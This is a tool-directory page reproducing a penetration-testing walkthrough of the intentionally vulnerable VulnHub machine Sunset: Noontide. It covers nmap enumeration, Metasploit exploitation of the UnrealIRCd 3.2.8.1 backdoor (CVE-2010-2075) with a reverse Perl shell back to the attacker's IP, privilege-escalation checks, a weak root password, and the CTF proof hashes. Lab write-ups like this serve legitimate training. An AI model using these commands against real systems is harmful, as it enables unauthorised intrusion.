Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacyΒ© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
sunset-noontide-pentesting β€” Description Professional penetration testing assessment of the Sunset: Noontide VulnHub machine, covering reconnaissance, service enumeration, CVE-2010-2075 exploitation, post-exploitation, privilege escalation, and full system compromise. | Kitploit
Tools/GitHubGitHub/zales2004/sunset-noontide-pentesting
Privilege EscalationReconnaissancePort ScanningVulnerability AnalysisExploitationPost-ExploitationNetwork SecurityCTFPenetration Testing

Most Popular

View all β†’

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools β†’
Share
Learning & Education
Red Teaming
Labs & Practice
GitHubzales2004/sunset-noontide-pentesting

sunset-noontide-pentesting

Description Professional penetration testing assessment of the Sunset: Noontide VulnHub machine, covering reconnaissance, service enumeration, CVE-2010-2075 exploitation, post-exploitation, privilege escalation, and full system compromise.

View Repository
2220 days agoNot yet reviewed

Sunset: Noontide β€” Penetration Testing

A professional penetration testing assessment and CTF walkthrough of Sunset: Noontide, an intentionally vulnerable machine from VulnHub.

This project documents the complete penetration testing lifecycle, including reconnaissance, service enumeration, vulnerability research, exploitation, initial access, post-exploitation, privilege escalation, proof-of-compromise, risk assessment, MITRE ATT&CK mapping, and remediation.

⚠️ Disclaimer: This assessment was performed against an intentionally vulnerable machine in an authorized laboratory environment. The techniques and commands documented here are intended only for systems for which explicit authorization has been obtained.


🎯 Objectives

  • Identify the target host
  • Enumerate exposed services
  • Identify vulnerable software and versions
  • Research applicable vulnerabilities
  • Exploit the vulnerable service
  • Obtain initial shell access
  • Perform Linux post-exploitation enumeration
  • Identify privilege escalation opportunities
  • Obtain root-level access
  • Recover user and root proof files
  • Document security findings
  • Provide remediation recommendations

πŸ–₯️ Lab Environment

ComponentDetails
TargetSunset: Noontide
PlatformVulnHub
Target IP10.106.186.186
Target Hostnamenoontide
Target OSDebian GNU/Linux 10 (Buster)
Architecturex86_64
Attacker PlatformKali Linux
Attacker IP10.106.186.204
Assessment TypeAuthorized Laboratory Assessment
Overall RiskCRITICAL
Assessment ResultFull System Compromise

πŸ” Attack Chain

Target Discovery β†’ Nmap Enumeration β†’ UnrealIRCd 3.2.8.1 Identified β†’ SearchSploit β†’ CVE-2010-2075 Identified β†’ Metasploit Exploitation β†’ Remote Command Shell β†’ Shell as server β†’ Linux Post-Exploitation β†’ Weak Root Credential β†’ su root β†’ UID 0 / Root Access β†’ User & Root Proof Files


1. Reconnaissance

Initial network discovery was performed to identify the vulnerable target.

The target was ultimately identified as:

10.106.186.186

During reconnaissance, 10.106.186.142 was identified as the default gateway rather than the intended target.

This highlights the importance of correctly identifying the target before performing further security testing, particularly in a bridged or shared laboratory network.


2. Service Enumeration

Nmap service and version detection was performed against the target using:

nmap -sV 10.106.186.186

The significant exposed service identified during the assessment was:

6667/tcp open irc UnrealIRCd

A more detailed scan was then performed using:

nmap -sC -sV -Pn -p 6667 10.106.186.186

The service was identified as:

UnrealIRCd 3.2.8.1

The IRC service also reported:

irc.foonet.com

The exposed UnrealIRCd service became the primary attack surface investigated during the assessment.


3. Vulnerability Research

SearchSploit was used to investigate publicly documented vulnerabilities associated with the discovered UnrealIRCd version.

Command:

searchsploit UnrealIRCd 3.2.8.1

The relevant result was:

UnrealIRCd 3.2.8.1 - Backdoor Command Exec

linux/remote/16922.rb

The vulnerability was identified as:

CVE-2010-2075

Vulnerability

UnrealIRCd 3.2.8.1 Backdoor Command Execution

Severity

Critical

Attack Type

Remote Command Execution

Security Impact

Successful exploitation of the vulnerable service allows an attacker to execute commands remotely on the target system.


4. Metasploit Exploitation

The vulnerable IRC service was exploited using the Metasploit Framework.

The selected module was:

exploit/unix/irc/unreal_ircd_3281_backdoor

Example configuration:

use exploit/unix/irc/unreal_ircd_3281_backdoor

set RHOST 10.106.186.186

Initial payload attempts did not produce a usable session.

A compatible Unix reverse-Perl payload was subsequently selected:

set payload cmd/unix/reverse_perl

set LHOST 10.106.186.204

set LPORT 4444

run

Metasploit reported that the target appeared vulnerable and successfully opened a command-shell session.


5. Initial Access

The obtained shell was verified using:

whoami

Result:

server

This confirmed successful remote command execution as the server account.

The initial working directory was:

/home/server/irc/Unreal3.2

At this stage, the assessment progressed from remote service exploitation to local post-exploitation enumeration.


6. Post-Exploitation Enumeration

After obtaining the shell, standard Linux enumeration was performed to understand the compromised host and identify potential privilege escalation paths.

Current User

Command:

id

Result:

uid=1000(server) gid=1000(server)

The account was a non-root user.

Hostname

Command:

hostname

Result:

noontide

Kernel Information

Command:

uname -a

Result:

Linux noontide 4.19.0-10-amd64 x86_64

Operating System

Command:

cat /etc/os-release

Result:

Debian GNU/Linux 10 (buster)

These commands established the current identity, hostname, kernel version, operating system, and general system configuration.


7. Privilege Escalation Enumeration

Several standard Linux privilege escalation checks were performed.

7.1 SUID Enumeration

Command:

find / -perm -4000 -type f 2>/dev/null

Standard SUID binaries such as passwd, chsh, mount, umount, su, chfn, newgrp, and gpasswd were identified.

No obvious custom or anomalous SUID binary was identified as the successful escalation vector.


7.2 Sudo Enumeration

Command:

sudo -l

No useful sudo-based privilege escalation path was identified from the available output.


7.3 Cron Enumeration

Commands:

cat /etc/crontab

ls -la /etc/cron.d/

ls -la /etc/cron.hourly/

ls -la /etc/cron.daily/

ls -la /etc/cron.weekly/

The observed scheduled jobs were standard Debian-style system jobs.

No obvious writable root cron job was identified.


7.4 Writable File Enumeration

Command:

find / -writable -type f 2>/dev/null | head -100

The initial results were primarily /proc pseudo-files and did not reveal a practical privilege escalation vector.


7.5 Linux Capabilities

Command:

getcap -r / 2>/dev/null

No useful capability-based privilege escalation was identified from the resulting output.


8. Privilege Escalation

The successful privilege escalation path was based on the intentionally weak root credentials configured on the vulnerable machine.

The root account was accessed using:

su root

Password:

root

Root access was then verified using:

id

Result:

uid=0(root) gid=0(root) groups=0(root)

The identity was also confirmed using:

whoami

Result:

root

This confirmed complete administrative control of the target system.


9. Proof of Compromise

9.1 User-Level Proof

The user-level proof file was located at:

/home/server/local.txt

Command:

cat /home/server/local.txt

Result:

c53c08b5bf2b0801c5d0c24149826a6e


9.2 Root-Level Proof

The root-level proof file was located at:

/root/proof.txt

Command:

cat /root/proof.txt

Result:

ab28c8ca8da1b9ffc2d702ac54221105

The root proof also returned:

Thanks for playing! - Felipe Winsnes (@whitecr0wz)

The recovery of both proof files confirms successful compromise from initial remote access through root-level control.


10. Risk Summary

IDFindingSeverityImpact
VULN-01UnrealIRCd 3.2.8.1 BackdoorπŸ”΄ CriticalRemote Command Execution
VULN-02Weak Root CredentialsπŸ”΄ CriticalComplete Administrative Compromise

11. Detailed Findings

VULN-01 β€” UnrealIRCd 3.2.8.1 Backdoor

Severity: Critical

Affected Service: IRC / TCP 6667

Affected Software: UnrealIRCd 3.2.8.1

CVE: CVE-2010-2075

Attack Type: Remote Command Execution

Download Tool